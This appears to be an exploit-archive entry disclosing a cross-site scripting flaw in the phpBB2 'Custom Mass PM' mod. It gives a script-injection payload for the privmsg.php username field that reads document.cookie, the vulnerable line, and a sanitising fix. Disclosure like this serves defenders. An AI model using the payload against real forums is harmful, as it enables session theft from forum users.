ID 1337DAY-ID-16769
Type zdt
Reporter Silic0n
Modified 2011-08-27T00:00:00
Description
Exploit for php platform in category web applications
^ Exploit title: PhpBB2 Module "Custom Mass PM" Cross Site Scripting Vulnerability
^ Author : Silic0n (science_media017[At]yahoo.com)
^ MOD Title: Custom mass PM
^ MOD Description: Add mass PM functionality to group members (or all forum members) for authorized users. Add the possibility for all users to send ordinary PM to multiple users (usernames separated by a semi-colon)
^ MOD Version: 1.4.7
^ Exploit Release: 8/27/2011
^ Vulnerable script: privmsg.php
--------------------
^ Payload
--------------------
0x1 : Go to forum_script/Privmsg.php
0x2 : In the username input box, write malicious JS, e.g.: <script>alert(document.cookie)</script>
--------------------
^ Vulnerable code
--------------------
$to_username_array = explode (";", $HTTP_POST_VARS['username']);
--------------------
Fix :
--------------------
$to_username = phpbb_clean_username($HTTP_POST_VARS['username']);
$to_username_array = explode (";", $to_username);
Special Thanks To mafi, Gaurav_raj420 , Exidous , Mr 52 (7) , Dalsim , Zetra , root4o ,
D4rk, Danzel, messsy , Thor ,abronsius ,Nova , jaya ,@[email protected] ,entr0py, -[SiLeNtp0is0n]-
,Ne0_Hacker, InX_R00t,DODo(:P) All ZH , DK & G4H members :)
------------
^ Site
------------
www.igniteds.net (ConsoleFx)
# 0day.today [2018-04-03] #